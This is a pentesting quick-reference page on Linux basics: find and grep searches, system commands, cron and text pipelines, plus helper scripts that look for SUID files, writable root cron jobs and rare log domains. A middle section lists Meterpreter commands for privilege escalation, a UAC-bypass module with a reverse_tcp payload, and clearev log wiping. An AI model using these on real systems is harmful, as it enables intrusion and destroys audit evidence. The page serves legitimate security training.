Pentesting Quick Reference OSCP and Beyond
Linux Basics

Essential Linux for Hackers.

Last updated 1 year ago

Reference

  • HACK THE BOX Academy Linux

Finding Files

find / -type f -name '*pass*' 2>/dev/null     # files with "pass" in the name; 2>/dev/null hides permission-denied noise
find / -type f -name '*.txt' 2>/dev/null      # quote the glob so the shell does not expand it before find sees it
find . -writable 2>/dev/null                  # writable paths: important to search for privilege escalation
find / -type f -perm -4000 -ls 2>/dev/null    # setuid (SUID) binaries, a classic privilege escalation check
find / -name '*.txt' -ls 2>/dev/null          # list all text files on the system with owner, size and mtime

Locate command

locate rockyou.txt
sudo updatedb    # refresh the locate database first; locate only knows about files indexed at the last run

ls with modified time

ls -lt     # long listing sorted by modification time, newest first (plain ls -t sorts but shows no timestamps)
ls -ltr    # same, oldest first, so the most recently changed file is at the bottom

Find files based on filename

find [directory path] -type f -name [filename]

find /home/Andy -type f -name sales.txt

Find Directory based on directory name

find [directory path] -type d -name [filename]

find /home/Andy -type d -name pictures

Find files based on size

find [directory path] -type f -size [size]

find /home/Andy -type f -size 10c

(c for bytes, k for kilobytes, M for megabytes, G for gigabytes; type 'man find' for full information on the options)

Find files based on username

find [directory path] -type f -user [username]

find /etc/server -type f -user john

Find files based on group name

find [directory path] -type f -group [group name]

find /etc/server -type f -group teamstar

Find files modified after a specific date

find [directory path] -type f -newermt '[date and time]'

find / -type f -newermt '6/30/2020 0:00:00'

(all dates/times after 6/30/2020 0:00:00 will be considered a condition to look for)

Find files based on date modified

find [directory path] -type f -newermt [start date range] ! -newermt [end date range]

find / -type f -newermt 2013-09-12 ! -newermt 2013-09-14

(-newermt 2013-09-12 keeps files modified after midnight at the start of 2013-09-12; ! -newermt 2013-09-14 drops files modified after midnight at the start of 2013-09-14. What remains are the files modified on 2013-09-12 or 2013-09-13.)

Find files based on date accessed

find [directory path] -type f -newerat [start date range] ! -newerat [end date range]

find / -type f -newerat 2017-09-12 ! -newerat 2017-09-14

(same logic with access time instead of modification time: this keeps files accessed on 2017-09-12 or 2017-09-13. Note that many systems mount with relatime or noatime, so access times are not always reliable.)

Find files with a specific keyword

grep -iRl [keyword] [directory path]

grep -iRl 'flag' /folderA

(-i ignores case, -R recurses into subdirectories, -l prints only the names of files that match instead of the matching lines)

Ignore lines matching a pattern

grep -v "hello"    # -v inverts the match: prints every line that does not contain "hello"

read the manual for the find command

man find

check the bash history of the current user (persisted in ~/.bash_history; other users' history files are worth a look when readable)

history
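
The find and grep patterns above are most useful when run together during a first look at a box. The helper below is an added example, not code from the original page: it wraps the setuid, world-writable, recently-modified and "contains password" searches in one function that prints a tagged line per hit. The function name, the tags, and the small directory tree built by demo_triage are assumptions for the demo.

```sh
#!/bin/sh
# Added example, not from the original page: a triage helper built from the
# find/grep one-liners above. The function name, the tags it prints and the
# sample tree created by demo_triage are assumptions.

# triage ROOT [MINUTES]
# Prints one "TAG path" line per hit:
#   SUID      setuid regular files (classic privilege-escalation candidates)
#   WRITABLE  world-writable regular files
#   RECENT    files modified in the last MINUTES minutes (default 60)
#   CREDHINT  files whose content mentions "password" (case-insensitive)
# -xdev keeps find on the starting filesystem, so /proc, /sys and /dev are
# skipped automatically when ROOT is /.
triage() {
    root="$1"
    minutes="${2:-60}"
    # -perm -4000: setuid bit set; -type f: ignore directories and symlinks
    find "$root" -xdev -type f -perm -4000 2>/dev/null | awk '{print "SUID " $0}'
    # -perm -002: the "other" write bit is set
    find "$root" -xdev -type f -perm -002 2>/dev/null | awk '{print "WRITABLE " $0}'
    # -mmin -N: modification time less than N minutes ago
    find "$root" -xdev -type f -mmin "-$minutes" 2>/dev/null | awk '{print "RECENT " $0}'
    # -i ignore case, -R recurse, -l print only file names
    grep -iRl 'password' "$root" 2>/dev/null | awk '{print "CREDHINT " $0}'
}

# demo_triage: builds a constructed directory tree and runs triage on it.
# Expected hits: SUID suidbin, WRITABLE shared.sh, CREDHINT app.ini, RECENT all three.
demo_triage() {
    d=$(mktemp -d)
    printf 'binary' > "$d/suidbin"                && chmod 4755 "$d/suidbin"
    printf 'db_password=hunter2\n' > "$d/app.ini" && chmod 600 "$d/app.ini"
    printf 'echo hi\n' > "$d/shared.sh"           && chmod 666 "$d/shared.sh"
    triage "$d" 60
    rm -rf "$d"
}

demo_triage
```

On a real host run `triage / 120` and pipe into `grep ^SUID` or `sort` as needed; the tag prefix exists so the four result types can be separated afterwards without re-running find.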

SSH key does not work

chmod 600 id_rsa    # ssh refuses a private key that is readable by group or others ("UNPROTECTED PRIVATE KEY FILE")

Check Sudo Permissions

sudo -l    # lists the commands the current user may run through sudo and as which user; entries marked NOPASSWD need no password

Calculate Hash

sha256sum filename    # computes the SHA-256 hash of the file; md5sum and sha1sum work the same way

Logs

Linux logs are located in /var/log (for example auth.log or secure for logins and sudo use, syslog or messages for general system events).

Important commands

whoami

Displays current username.

id

Returns the user's identity: UID, primary GID and every supplementary group the user belongs to.

hostname

Sets or prints the name of current host system.

uname -a

Prints basic information about the operating system name and system hardware.

pwd

Returns working directory name.

ifconfig

Assigns or views the address of a network interface and configures interface parameters (legacy net-tools; not installed by default on many modern distributions).

ip

ip is the modern utility to show or manipulate routing, network devices, interfaces and tunnels (ip a for addresses, ip r for routes).

netstat

Shows network status: sockets, listening ports and routing (legacy, from net-tools).

ss

The modern replacement for netstat to investigate sockets (ss -tulpn lists listening TCP/UDP ports with the owning process).

ps

Shows process status for the current terminal session only.

ps aux

Shows the processes of all users with owner, CPU/memory usage and full command line.

top

Real-time view of processes.

who

Displays who is logged in.

env

Prints environment or sets and executes command.

lsblk

Lists block devices.

lsusb

Lists USB devices

lsof

Lists opened files.

lspci

Lists PCI devices.

wc -l access.log

Shows the number of lines in a file.

su

The su utility requests the target user's credentials via PAM and switches to that user ID (the default user is the superuser), then starts a shell. Example: su - rocketchat switches to the user rocketchat; the dash gives a login shell with that user's environment.

useradd

Creates a new user or update default new user information.

userdel

Deletes a user account and related files.

usermod

Modifies a user account.

addgroup

Adds a group to the system.

delgroup

Removes a group from the system.

passwd

Changes user password.

lsb_release -a

Current distribution name and version (alternatives: cat /etc/os-release; uname -r for the kernel version).

Start stop service

systemctl start myservice      # start now
systemctl stop myservice       # stop now
systemctl enable myservice     # add to system start-up
systemctl disable myservice    # remove from system start-up

Background process

  • ctrl+z suspends the foreground job; bg resumes it in the background

  • add & at the end of a command to start it in the background

  • jobs lists background jobs; fg %1 brings job 1 back to the foreground (fg takes a job number, not a process ID)

Important Files

File                            Directory   Importance
shadow, passwd                  /etc        passwords: passwd lists accounts (world-readable), shadow holds the hashes (root-only)
sudoers                         /etc        sudo permissions
log, backup                     /var        logs and backup copies
(any)                           /tmp        writable in most cases
fail2ban.log, ufw.log, apache   /var/log    important logs

cronjobs

cron is a daemon started during boot that is responsible for running scheduled jobs. A crontab is a specially formatted file that the cron process reads line by line; each job line has five time fields followed by the command to run:

Value   Description
MIN     minute to execute at (0-59)
HOUR    hour to execute at (0-23)
DOM     day of the month to execute at (1-31)
MON     month of the year to execute at (1-12)
DOW     day of the week to execute at (0-7; 0 and 7 are both Sunday)
CMD     the actual command that will be executed

An asterisk in a time field means "every". /etc/crontab and the files in /etc/cron.d have one extra column between DOW and CMD naming the user the job runs as.

crontab -l           # list the current user's crontab
cat /etc/crontab     # system-wide jobs; also check /etc/cron.d/ and /etc/cron.{hourly,daily,weekly,monthly}/
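
Knowing the field layout matters because the practical check on a box is not "what runs" but "can I overwrite what runs as root". The script below is an added example, not code from the original page: it parses crontab-format text, handles both user crontabs and the system format with the extra user column, and reports jobs whose program file is writable by the current user. The function names and the sample crontab written by demo_crontab are assumptions.

```sh
#!/bin/sh
# Added example, not from the original page: reports scheduled jobs whose
# program the current user can overwrite (the classic cron privesc check).
# Function names and the sample crontab written by demo_crontab are assumptions.

# check_crontab FILE [SYSTEM]
#   FILE    crontab-format file to parse
#   SYSTEM  1 if FILE uses the /etc/crontab or /etc/cron.d layout, where a
#           user column follows the five time fields; 0 (default) for a
#           per-user crontab (crontab -l output)
# Prints "WRITABLE user program" for each job whose program is writable.
check_crontab() {
    file="$1"
    system="${2:-0}"
    # Drop blank lines, comments and VAR=value assignments (SHELL=, PATH=, ...).
    grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_][A-Za-z0-9_]*=' "$file" |
    while read -r min hour dom mon dow rest; do
        # @reboot / @daily style entries have one schedule word, not five,
        # so the remaining words were read into the wrong variables.
        if [ "${min#@}" != "$min" ]; then
            rest="$hour $dom $mon $dow $rest"
        fi
        if [ "$system" = "1" ]; then
            user="${rest%% *}"      # first word: the account the job runs as
            cmd="${rest#* }"        # everything after it: the command
        else
            user="$(id -un)"        # user crontabs run as their owner
            cmd="$rest"
        fi
        # The first word of the command is the program cron will execute.
        prog="${cmd%% *}"
        # Only absolute paths are checked: cron runs with a minimal PATH, so a
        # bare name would resolve inside cron's environment, not this shell's.
        case "$prog" in
            /*) if [ -w "$prog" ]; then echo "WRITABLE $user $prog"; fi ;;
        esac
    done
}

# demo_crontab: writes a constructed system-style crontab whose backup script
# is owned (and therefore writable) by the current user, then checks it.
# Expected output: one WRITABLE line for backup.sh; the @reboot job points at
# a non-existent file and the "true" job has no absolute path.
demo_crontab() {
    d=$(mktemp -d)
    printf '#!/bin/sh\ntar czf /var/backups/www.tgz /var/www\n' > "$d/backup.sh"
    chmod 755 "$d/backup.sh"
    cat > "$d/crontab" <<EOF
# m h dom mon dow user command
SHELL=/bin/sh
*/5 * * * * root $d/backup.sh --full
@reboot root /nonexistent/start.sh
0 3 * * * root true
EOF
    check_crontab "$d/crontab" 1
    rm -rf "$d"
}

demo_crontab
```

On a target, run it over /etc/crontab and every file in /etc/cron.d (`for f in /etc/crontab /etc/cron.d/*; do check_crontab "$f" 1; done`). A writable script that runs as root is only half the story; also look at whether the directory holding the script is writable, since replacing the file works just as well as editing it.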

Services

Start a service

systemctl start ssh
systemctl status ssh

run a service after start up

systemctl enable ssh

Enumerate services

ps aux
systemctl list-units --type=service

Access a shared folder

In the file manager's Network tab press ctrl + L and enter the share address:

smb://192.168.1.11

Escalate the privilege

getsystem          # Meterpreter: tries every built-in local privilege escalation technique in turn
getsystem -t 1     # use only technique 1, named pipe impersonation

Bypass Windows UAC

background the session with ctrl+z (or the background command), then:

use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set payload windows/meterpreter/reverse_tcp
run

Clear logs

clearev    # Meterpreter: clears the Windows Application, System and Security event logs

Cat alternative

If cat is not available (or is blocked), try head, tail, less, more, nano or vim. If none of those work, grep can dump a file's contents:

grep . hash.txt    # "." matches any character, so every non-empty line of the file is printed
grep -R .          # prints every line of every file under the current directory, prefixed with the file name

Playing with text. Sorting, finding uniques values and cutting the values

# The first use of the cut command retrieves the column of the domain:port, and the second one removes the port by splitting it with a colon.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1
sway.com
sway.com
sway.office.com
--- REDACTED FOR BREVITY ---

# After retrieving the domains, the sort command arranges the list in alphabetical order

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
--- REDACTED FOR BREVITY ---

# Lastly, the uniq command removes all the duplicates

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq
account.activedirectory.windowsazure.com
activity.windows.com
admin.microsoft.com
--- REDACTED FOR BREVITY ---

We already have the list of unique domains based on our previous use case. Now, we only need to add some parameters to our commands to get the count of each domain accessed. This can be done by adding the -c option to the uniq command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c
    423 account.activedirectory.windowsazure.com
    184 activity.windows.com
    680 admin.microsoft.com
    272 admin.onedrive.com
    304 adminwebservice.microsoftonline.com

Moreover, the result can be sorted again based on the count of each domain by using the -n option of the sort command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -n
     78 partnerservices.getmicrosoftkey.com
    113 **REDACTED**
    118 ocsp.digicert.com
    123 officeclient.microsoft.com
--- REDACTED FOR BREVITY ---

Based on the result, you can see that the count of connections made for each domain is sorted in ascending order. If you want to make the output appear in descending order, use the -r option. Note that it can also be combined with the -n option (-nr if written together).

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -nr
   4992 www.office.com
   4695 login.microsoftonline.com
   1860 www.globalsign.com
   1581 **REDACTED**
   1554 learn.microsoft.com
--- REDACTED FOR BREVITY ---
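
The pipeline above is easier to reuse when it is a function with the field number as a parameter, and the frequency table it produces also supports a question the page's output does not show: which destinations were contacted only once or twice. The block below is an added example, not code from the original page; the function names and the proxy-style sample lines written by write_sample_log are assumptions (constructed, not real traffic).

```sh
#!/bin/sh
# Added example, not from the original page: the cut | sort | uniq -c pipeline
# above as reusable functions, plus a "rare destination" view. Function names
# and the sample log lines (constructed, not real traffic) are assumptions.

# write_sample_log FILE: constructed proxy-style lines; field 3 is host:port.
write_sample_log() {
    cat > "$1" <<'EOF'
2024-03-01T08:00:01 10.0.0.5 www.office.com:443 CONNECT 200
2024-03-01T08:00:02 10.0.0.5 login.microsoftonline.com:443 CONNECT 200
2024-03-01T08:00:03 10.0.0.7 www.office.com:443 CONNECT 200
2024-03-01T08:00:04 10.0.0.7 update.evil-cdn.example:8443 CONNECT 200
2024-03-01T08:00:05 10.0.0.5 www.office.com:80 GET 301
2024-03-01T08:00:06 10.0.0.9 login.microsoftonline.com:443 CONNECT 200
EOF
}

# domain_counts LOG [FIELD]: prints "count domain" lines, most frequent first.
# FIELD is the 1-based space-separated column holding host:port (default 3).
# The second cut strips the port, so www.office.com:443 and www.office.com:80
# are counted as one domain. sort -k1,1nr -k2,2 orders by count descending and
# then by name, which keeps the output deterministic when counts tie.
domain_counts() {
    cut -d ' ' -f "${2:-3}" "$1" | cut -d ':' -f 1 | sort | uniq -c |
        awk '{print $1, $2}' | sort -k1,1nr -k2,2
}

# rare_domains LOG [MAX]: domains seen at most MAX times (default 1).
# Least-frequency-of-occurrence is a cheap first pass for odd destinations
# hiding under thousands of legitimate Microsoft 365 connections.
rare_domains() {
    domain_counts "$1" | awk -v max="${2:-1}" '$1 <= max { print $2 }'
}

# demo_counts: writes the constructed log to a temp file and shows both views.
demo_counts() {
    f=$(mktemp)
    write_sample_log "$f"
    echo "== counts =="
    domain_counts "$f"
    echo "== seen once =="
    rare_domains "$f"
    rm -f "$f"
}

demo_counts
```

For a real access.log, call `domain_counts access.log 3` and `rare_domains access.log 2`; adjust the field number if the log puts the destination in a different column.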

Online crontab generators can be used to build a schedule line. Crontabs are edited with crontab -e, which opens your crontab in an editor of your choice (such as Nano).

https://tryhackme.com/room/linuxfundamentalspart3
https://tryhackme.com/room/linuxstrengthtraining
https://explainshell.com/